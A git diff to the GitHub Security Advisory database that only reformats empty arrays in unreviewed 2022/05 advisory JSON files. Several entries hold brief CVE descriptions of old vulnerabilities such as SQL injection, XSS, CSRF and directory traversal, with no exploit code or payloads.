diff --git a/advisories/unreviewed/2022/05/GHSA-9mfr-hm36-9xvq/GHSA-9mfr-hm36-9xvq.json b/advisories/unreviewed/2022/05/GHSA-9mfr-hm36-9xvq/GHSA-9mfr-hm36-9xvq.json
index 67e652a757a..ad99a3f4b61 100644
--- a/advisories/unreviewed/2022/05/GHSA-9mfr-hm36-9xvq/GHSA-9mfr-hm36-9xvq.json
+++ b/advisories/unreviewed/2022/05/GHSA-9mfr-hm36-9xvq/GHSA-9mfr-hm36-9xvq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-9vx6-wq2c-qc53/GHSA-9vx6-wq2c-qc53.json b/advisories/unreviewed/2022/05/GHSA-9vx6-wq2c-qc53/GHSA-9vx6-wq2c-qc53.json
index c0b669a619f..458b3e3dbe1 100644
--- a/advisories/unreviewed/2022/05/GHSA-9vx6-wq2c-qc53/GHSA-9vx6-wq2c-qc53.json
+++ b/advisories/unreviewed/2022/05/GHSA-9vx6-wq2c-qc53/GHSA-9vx6-wq2c-qc53.json
@@ -7,12 +7,8 @@
"CVE-2014-4851"
],
"details": "Open redirect vulnerability in msg.php in FoeCMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the r parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-9w8v-xh62-pvw6/GHSA-9w8v-xh62-pvw6.json b/advisories/unreviewed/2022/05/GHSA-9w8v-xh62-pvw6/GHSA-9w8v-xh62-pvw6.json
index b9fb5a1ebb6..4512961670a 100644
--- a/advisories/unreviewed/2022/05/GHSA-9w8v-xh62-pvw6/GHSA-9w8v-xh62-pvw6.json
+++ b/advisories/unreviewed/2022/05/GHSA-9w8v-xh62-pvw6/GHSA-9w8v-xh62-pvw6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-9xp2-mc87-6vh8/GHSA-9xp2-mc87-6vh8.json b/advisories/unreviewed/2022/05/GHSA-9xp2-mc87-6vh8/GHSA-9xp2-mc87-6vh8.json
index 9893ab8b7b3..f015597df67 100644
--- a/advisories/unreviewed/2022/05/GHSA-9xp2-mc87-6vh8/GHSA-9xp2-mc87-6vh8.json
+++ b/advisories/unreviewed/2022/05/GHSA-9xp2-mc87-6vh8/GHSA-9xp2-mc87-6vh8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-c244-prpx-2q63/GHSA-c244-prpx-2q63.json b/advisories/unreviewed/2022/05/GHSA-c244-prpx-2q63/GHSA-c244-prpx-2q63.json
index 3112da0f808..b2562a9af20 100644
--- a/advisories/unreviewed/2022/05/GHSA-c244-prpx-2q63/GHSA-c244-prpx-2q63.json
+++ b/advisories/unreviewed/2022/05/GHSA-c244-prpx-2q63/GHSA-c244-prpx-2q63.json
@@ -7,12 +7,8 @@
"CVE-2014-2366"
],
"details": "upAdminPg.asp in Advantech WebAccess before 7.2 allows remote authenticated users to discover credentials by reading HTML source code.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-c2pp-ff3q-qvxc/GHSA-c2pp-ff3q-qvxc.json b/advisories/unreviewed/2022/05/GHSA-c2pp-ff3q-qvxc/GHSA-c2pp-ff3q-qvxc.json
index 88ff9fa7882..cceeb30266f 100644
--- a/advisories/unreviewed/2022/05/GHSA-c2pp-ff3q-qvxc/GHSA-c2pp-ff3q-qvxc.json
+++ b/advisories/unreviewed/2022/05/GHSA-c2pp-ff3q-qvxc/GHSA-c2pp-ff3q-qvxc.json
@@ -7,12 +7,8 @@
"CVE-2013-3301"
],
"details": "The ftrace implementation in the Linux kernel before 3.8.8 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by leveraging the CAP_SYS_ADMIN capability for write access to the (1) set_ftrace_pid or (2) set_graph_function file, and then making an lseek system call.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -88,9 +84,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-c356-gp5w-pv9x/GHSA-c356-gp5w-pv9x.json b/advisories/unreviewed/2022/05/GHSA-c356-gp5w-pv9x/GHSA-c356-gp5w-pv9x.json
index 1971bcbb8e2..3a5160abbc2 100644
--- a/advisories/unreviewed/2022/05/GHSA-c356-gp5w-pv9x/GHSA-c356-gp5w-pv9x.json
+++ b/advisories/unreviewed/2022/05/GHSA-c356-gp5w-pv9x/GHSA-c356-gp5w-pv9x.json
@@ -7,12 +7,8 @@
"CVE-2014-4715"
],
"details": "Yann Collet LZ4 before r119, when used on certain 32-bit platforms that allocate memory beyond 0x80000000, does not properly detect integer overflows, which allows context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run, a different vulnerability than CVE-2014-4611.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -40,9 +36,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-c3hc-hr74-pcm7/GHSA-c3hc-hr74-pcm7.json b/advisories/unreviewed/2022/05/GHSA-c3hc-hr74-pcm7/GHSA-c3hc-hr74-pcm7.json
index a368bb91bd5..db95ad01df7 100644
--- a/advisories/unreviewed/2022/05/GHSA-c3hc-hr74-pcm7/GHSA-c3hc-hr74-pcm7.json
+++ b/advisories/unreviewed/2022/05/GHSA-c3hc-hr74-pcm7/GHSA-c3hc-hr74-pcm7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-c54c-p933-mmrc/GHSA-c54c-p933-mmrc.json b/advisories/unreviewed/2022/05/GHSA-c54c-p933-mmrc/GHSA-c54c-p933-mmrc.json
index 3677e485220..4b411b2a3b7 100644
--- a/advisories/unreviewed/2022/05/GHSA-c54c-p933-mmrc/GHSA-c54c-p933-mmrc.json
+++ b/advisories/unreviewed/2022/05/GHSA-c54c-p933-mmrc/GHSA-c54c-p933-mmrc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-c7pc-vh27-jpqf/GHSA-c7pc-vh27-jpqf.json b/advisories/unreviewed/2022/05/GHSA-c7pc-vh27-jpqf/GHSA-c7pc-vh27-jpqf.json
index 02706c975dc..42777b04f1b 100644
--- a/advisories/unreviewed/2022/05/GHSA-c7pc-vh27-jpqf/GHSA-c7pc-vh27-jpqf.json
+++ b/advisories/unreviewed/2022/05/GHSA-c7pc-vh27-jpqf/GHSA-c7pc-vh27-jpqf.json
@@ -7,12 +7,8 @@
"CVE-2014-4929"
],
"details": "Directory traversal vulnerability in the routing component in ownCloud Server before 5.0.17 and 6.0.x before 6.0.4 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in a filename, related to index.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cc95-jcm8-xmfh/GHSA-cc95-jcm8-xmfh.json b/advisories/unreviewed/2022/05/GHSA-cc95-jcm8-xmfh/GHSA-cc95-jcm8-xmfh.json
index 77c06c4e0ed..55d701eb974 100644
--- a/advisories/unreviewed/2022/05/GHSA-cc95-jcm8-xmfh/GHSA-cc95-jcm8-xmfh.json
+++ b/advisories/unreviewed/2022/05/GHSA-cc95-jcm8-xmfh/GHSA-cc95-jcm8-xmfh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cf5c-cp75-9wvg/GHSA-cf5c-cp75-9wvg.json b/advisories/unreviewed/2022/05/GHSA-cf5c-cp75-9wvg/GHSA-cf5c-cp75-9wvg.json
index 6bd0b91a749..630c175be89 100644
--- a/advisories/unreviewed/2022/05/GHSA-cf5c-cp75-9wvg/GHSA-cf5c-cp75-9wvg.json
+++ b/advisories/unreviewed/2022/05/GHSA-cf5c-cp75-9wvg/GHSA-cf5c-cp75-9wvg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-cf83-77fm-2rj8/GHSA-cf83-77fm-2rj8.json b/advisories/unreviewed/2022/05/GHSA-cf83-77fm-2rj8/GHSA-cf83-77fm-2rj8.json
index c8f64332bd1..233009b60fa 100644
--- a/advisories/unreviewed/2022/05/GHSA-cf83-77fm-2rj8/GHSA-cf83-77fm-2rj8.json
+++ b/advisories/unreviewed/2022/05/GHSA-cf83-77fm-2rj8/GHSA-cf83-77fm-2rj8.json
@@ -7,12 +7,8 @@
"CVE-2014-4717"
],
"details": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Simple Share Buttons Adder plugin before 4.5 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) ssba_share_text parameter in a save action to wp-admin/options-general.php, which is not properly handled in the homepage, and unspecified vectors related to (2) Pages, (3) Posts, (4) Category/Archive pages or (5) post Excerpts.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cg8q-mvmc-qr6h/GHSA-cg8q-mvmc-qr6h.json b/advisories/unreviewed/2022/05/GHSA-cg8q-mvmc-qr6h/GHSA-cg8q-mvmc-qr6h.json
index 34820a9c2ee..91d31b6f6cd 100644
--- a/advisories/unreviewed/2022/05/GHSA-cg8q-mvmc-qr6h/GHSA-cg8q-mvmc-qr6h.json
+++ b/advisories/unreviewed/2022/05/GHSA-cg8q-mvmc-qr6h/GHSA-cg8q-mvmc-qr6h.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-chxw-2vjc-ppm6/GHSA-chxw-2vjc-ppm6.json b/advisories/unreviewed/2022/05/GHSA-chxw-2vjc-ppm6/GHSA-chxw-2vjc-ppm6.json
index 515c311802c..ddbd7ed0159 100644
--- a/advisories/unreviewed/2022/05/GHSA-chxw-2vjc-ppm6/GHSA-chxw-2vjc-ppm6.json
+++ b/advisories/unreviewed/2022/05/GHSA-chxw-2vjc-ppm6/GHSA-chxw-2vjc-ppm6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cjj6-j9p7-88r5/GHSA-cjj6-j9p7-88r5.json b/advisories/unreviewed/2022/05/GHSA-cjj6-j9p7-88r5/GHSA-cjj6-j9p7-88r5.json
index 191b37d3806..2fef6968e04 100644
--- a/advisories/unreviewed/2022/05/GHSA-cjj6-j9p7-88r5/GHSA-cjj6-j9p7-88r5.json
+++ b/advisories/unreviewed/2022/05/GHSA-cjj6-j9p7-88r5/GHSA-cjj6-j9p7-88r5.json
@@ -7,12 +7,8 @@
"CVE-2012-6648"
],
"details": "gdm/guest-session-cleanup.sh in gdm-guest-session 0.24 and earlier, as used in Ubuntu Linux 10.04 LTS, 10.10, and 11.04, allows local users to delete arbitrary files via a space in the name of a file in /tmp. NOTE: this identifier was SPLIT from CVE-2012-0943 per ADT1/ADT2 due to different codebases and affected versions. CVE-2012-0943 is used for the guest-account issue.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "LOW",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-cmx5-qh3j-9rhp/GHSA-cmx5-qh3j-9rhp.json b/advisories/unreviewed/2022/05/GHSA-cmx5-qh3j-9rhp/GHSA-cmx5-qh3j-9rhp.json
index 793d74f7736..c4aa37b8291 100644
--- a/advisories/unreviewed/2022/05/GHSA-cmx5-qh3j-9rhp/GHSA-cmx5-qh3j-9rhp.json
+++ b/advisories/unreviewed/2022/05/GHSA-cmx5-qh3j-9rhp/GHSA-cmx5-qh3j-9rhp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cq63-hxhv-cqrh/GHSA-cq63-hxhv-cqrh.json b/advisories/unreviewed/2022/05/GHSA-cq63-hxhv-cqrh/GHSA-cq63-hxhv-cqrh.json
index f67966ed3bc..5295c52a612 100644
--- a/advisories/unreviewed/2022/05/GHSA-cq63-hxhv-cqrh/GHSA-cq63-hxhv-cqrh.json
+++ b/advisories/unreviewed/2022/05/GHSA-cq63-hxhv-cqrh/GHSA-cq63-hxhv-cqrh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-crpp-52hr-6q78/GHSA-crpp-52hr-6q78.json b/advisories/unreviewed/2022/05/GHSA-crpp-52hr-6q78/GHSA-crpp-52hr-6q78.json
index 6a7b832b62c..a4062b71caf 100644
--- a/advisories/unreviewed/2022/05/GHSA-crpp-52hr-6q78/GHSA-crpp-52hr-6q78.json
+++ b/advisories/unreviewed/2022/05/GHSA-crpp-52hr-6q78/GHSA-crpp-52hr-6q78.json
@@ -7,12 +7,8 @@
"CVE-2009-2113"
],
"details": "Multiple SQL injection vulnerabilities in FretsWeb 1.2 allow remote attackers to execute arbitrary SQL commands via the (1) name parameter to player.php and the (2) hash parameter to song.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cvvg-v2x4-j3c2/GHSA-cvvg-v2x4-j3c2.json b/advisories/unreviewed/2022/05/GHSA-cvvg-v2x4-j3c2/GHSA-cvvg-v2x4-j3c2.json
index f2d7f9b5382..20b956768a1 100644
--- a/advisories/unreviewed/2022/05/GHSA-cvvg-v2x4-j3c2/GHSA-cvvg-v2x4-j3c2.json
+++ b/advisories/unreviewed/2022/05/GHSA-cvvg-v2x4-j3c2/GHSA-cvvg-v2x4-j3c2.json
@@ -7,12 +7,8 @@
"CVE-2009-2109"
],
"details": "Multiple directory traversal vulnerabilities in FretsWeb 1.2 allow remote attackers to read arbitrary files via directory traversal sequences in the (1) language parameter to charts.php and the (2) fretsweb_language cookie parameter to unspecified vectors, possibly related to admin/common.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cw42-gp9m-qx5j/GHSA-cw42-gp9m-qx5j.json b/advisories/unreviewed/2022/05/GHSA-cw42-gp9m-qx5j/GHSA-cw42-gp9m-qx5j.json
index 2dea026f51a..84f6fc2cb12 100644
--- a/advisories/unreviewed/2022/05/GHSA-cw42-gp9m-qx5j/GHSA-cw42-gp9m-qx5j.json
+++ b/advisories/unreviewed/2022/05/GHSA-cw42-gp9m-qx5j/GHSA-cw42-gp9m-qx5j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cwh2-4vj6-47c7/GHSA-cwh2-4vj6-47c7.json b/advisories/unreviewed/2022/05/GHSA-cwh2-4vj6-47c7/GHSA-cwh2-4vj6-47c7.json
index abf9f456353..66b1a5e1067 100644
--- a/advisories/unreviewed/2022/05/GHSA-cwh2-4vj6-47c7/GHSA-cwh2-4vj6-47c7.json
+++ b/advisories/unreviewed/2022/05/GHSA-cwh2-4vj6-47c7/GHSA-cwh2-4vj6-47c7.json
@@ -7,12 +7,8 @@
"CVE-2014-4944"
],
"details": "Multiple SQL injection vulnerabilities in inc/bsk-pdf-dashboard.php in the BSK PDF Manager plugin 1.3.2 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) categoryid or (2) pdfid parameter to wp-admin/admin.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cwpg-mv72-89pc/GHSA-cwpg-mv72-89pc.json b/advisories/unreviewed/2022/05/GHSA-cwpg-mv72-89pc/GHSA-cwpg-mv72-89pc.json
index 70856ee9215..bae0313a7fc 100644
--- a/advisories/unreviewed/2022/05/GHSA-cwpg-mv72-89pc/GHSA-cwpg-mv72-89pc.json
+++ b/advisories/unreviewed/2022/05/GHSA-cwpg-mv72-89pc/GHSA-cwpg-mv72-89pc.json
@@ -7,12 +7,8 @@
"CVE-2014-4162"
],
"details": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Zyxel P-660HW-T1 (v3) wireless router allow remote attackers to hijack the authentication of administrators for requests that change the (1) wifi password or (2) SSID via a request to Forms/WLAN_General_1.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cx6q-ff8w-2x9m/GHSA-cx6q-ff8w-2x9m.json b/advisories/unreviewed/2022/05/GHSA-cx6q-ff8w-2x9m/GHSA-cx6q-ff8w-2x9m.json
index 7b309064a8e..e0a31f051a5 100644
--- a/advisories/unreviewed/2022/05/GHSA-cx6q-ff8w-2x9m/GHSA-cx6q-ff8w-2x9m.json
+++ b/advisories/unreviewed/2022/05/GHSA-cx6q-ff8w-2x9m/GHSA-cx6q-ff8w-2x9m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cxmv-j56r-fqw2/GHSA-cxmv-j56r-fqw2.json b/advisories/unreviewed/2022/05/GHSA-cxmv-j56r-fqw2/GHSA-cxmv-j56r-fqw2.json
index 11527ce16b1..65e8f17a774 100644
--- a/advisories/unreviewed/2022/05/GHSA-cxmv-j56r-fqw2/GHSA-cxmv-j56r-fqw2.json
+++ b/advisories/unreviewed/2022/05/GHSA-cxmv-j56r-fqw2/GHSA-cxmv-j56r-fqw2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-cxrg-mr6r-6r8x/GHSA-cxrg-mr6r-6r8x.json b/advisories/unreviewed/2022/05/GHSA-cxrg-mr6r-6r8x/GHSA-cxrg-mr6r-6r8x.json
index d97920401a3..d10f378d4a4 100644
--- a/advisories/unreviewed/2022/05/GHSA-cxrg-mr6r-6r8x/GHSA-cxrg-mr6r-6r8x.json
+++ b/advisories/unreviewed/2022/05/GHSA-cxrg-mr6r-6r8x/GHSA-cxrg-mr6r-6r8x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f2rg-wjgw-95g9/GHSA-f2rg-wjgw-95g9.json b/advisories/unreviewed/2022/05/GHSA-f2rg-wjgw-95g9/GHSA-f2rg-wjgw-95g9.json
index 9142de0086b..42c1aacc50f 100644
--- a/advisories/unreviewed/2022/05/GHSA-f2rg-wjgw-95g9/GHSA-f2rg-wjgw-95g9.json
+++ b/advisories/unreviewed/2022/05/GHSA-f2rg-wjgw-95g9/GHSA-f2rg-wjgw-95g9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f2wh-c6mm-3vrx/GHSA-f2wh-c6mm-3vrx.json b/advisories/unreviewed/2022/05/GHSA-f2wh-c6mm-3vrx/GHSA-f2wh-c6mm-3vrx.json
index 906f3467903..55f1adc1c9b 100644
--- a/advisories/unreviewed/2022/05/GHSA-f2wh-c6mm-3vrx/GHSA-f2wh-c6mm-3vrx.json
+++ b/advisories/unreviewed/2022/05/GHSA-f2wh-c6mm-3vrx/GHSA-f2wh-c6mm-3vrx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f357-rvv6-2423/GHSA-f357-rvv6-2423.json b/advisories/unreviewed/2022/05/GHSA-f357-rvv6-2423/GHSA-f357-rvv6-2423.json
index c258d3108e0..97d14f2598d 100644
--- a/advisories/unreviewed/2022/05/GHSA-f357-rvv6-2423/GHSA-f357-rvv6-2423.json
+++ b/advisories/unreviewed/2022/05/GHSA-f357-rvv6-2423/GHSA-f357-rvv6-2423.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f45j-hf6c-jw9f/GHSA-f45j-hf6c-jw9f.json b/advisories/unreviewed/2022/05/GHSA-f45j-hf6c-jw9f/GHSA-f45j-hf6c-jw9f.json
index cad89a9b4e3..8680bed5077 100644
--- a/advisories/unreviewed/2022/05/GHSA-f45j-hf6c-jw9f/GHSA-f45j-hf6c-jw9f.json
+++ b/advisories/unreviewed/2022/05/GHSA-f45j-hf6c-jw9f/GHSA-f45j-hf6c-jw9f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f474-8rpx-9484/GHSA-f474-8rpx-9484.json b/advisories/unreviewed/2022/05/GHSA-f474-8rpx-9484/GHSA-f474-8rpx-9484.json
index 79bc934244d..7b56a318bc1 100644
--- a/advisories/unreviewed/2022/05/GHSA-f474-8rpx-9484/GHSA-f474-8rpx-9484.json
+++ b/advisories/unreviewed/2022/05/GHSA-f474-8rpx-9484/GHSA-f474-8rpx-9484.json
@@ -7,12 +7,8 @@
"CVE-2014-4532"
],
"details": "Cross-site scripting (XSS) vulnerability in templates/printAdminUsersList_Footer.tpl.php in the GarageSale plugin before 1.2.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f492-fgmp-2462/GHSA-f492-fgmp-2462.json b/advisories/unreviewed/2022/05/GHSA-f492-fgmp-2462/GHSA-f492-fgmp-2462.json
index 2c90ff84cfe..5bfde00e8fb 100644
--- a/advisories/unreviewed/2022/05/GHSA-f492-fgmp-2462/GHSA-f492-fgmp-2462.json
+++ b/advisories/unreviewed/2022/05/GHSA-f492-fgmp-2462/GHSA-f492-fgmp-2462.json
@@ -7,12 +7,8 @@
"CVE-2013-6117"
],
"details": "Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json b/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json
index 52fc5121754..3779bf17fda 100644
--- a/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json
+++ b/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f55m-93cv-4f3r/GHSA-f55m-93cv-4f3r.json b/advisories/unreviewed/2022/05/GHSA-f55m-93cv-4f3r/GHSA-f55m-93cv-4f3r.json
index 4cec9032b42..beccf024a50 100644
--- a/advisories/unreviewed/2022/05/GHSA-f55m-93cv-4f3r/GHSA-f55m-93cv-4f3r.json
+++ b/advisories/unreviewed/2022/05/GHSA-f55m-93cv-4f3r/GHSA-f55m-93cv-4f3r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f57q-wp5c-hvr2/GHSA-f57q-wp5c-hvr2.json b/advisories/unreviewed/2022/05/GHSA-f57q-wp5c-hvr2/GHSA-f57q-wp5c-hvr2.json
index 3c36eb42b8c..0dfccb2828b 100644
--- a/advisories/unreviewed/2022/05/GHSA-f57q-wp5c-hvr2/GHSA-f57q-wp5c-hvr2.json
+++ b/advisories/unreviewed/2022/05/GHSA-f57q-wp5c-hvr2/GHSA-f57q-wp5c-hvr2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f65c-g26c-wpq5/GHSA-f65c-g26c-wpq5.json b/advisories/unreviewed/2022/05/GHSA-f65c-g26c-wpq5/GHSA-f65c-g26c-wpq5.json
index 3ac87a7db84..be0354244d4 100644
--- a/advisories/unreviewed/2022/05/GHSA-f65c-g26c-wpq5/GHSA-f65c-g26c-wpq5.json
+++ b/advisories/unreviewed/2022/05/GHSA-f65c-g26c-wpq5/GHSA-f65c-g26c-wpq5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
